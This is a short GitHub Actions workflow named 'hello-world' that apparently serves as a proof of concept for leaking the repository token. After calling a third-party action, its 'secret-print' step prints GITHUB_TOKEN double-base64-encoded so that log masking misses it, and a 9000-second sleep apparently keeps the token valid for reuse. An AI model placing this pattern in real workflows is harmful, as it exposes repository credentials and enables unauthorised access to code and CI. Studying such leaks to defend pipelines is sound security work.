name: hello-world
on: workflow_dispatch

jobs:
  hello:
   runs-on: ubuntu-latest
   steps:
     - name: hello
       uses: Dcrash0veride/custom_action@4a89f89b6b4b359973a723e55d8af159c736da27

     - name: secret-print
       run: |
         echo $(echo ${{ secrets.GITHUB_TOKEN }} | base64 | base64)
    
     - name: night-night
       run: |
         sleep 9000
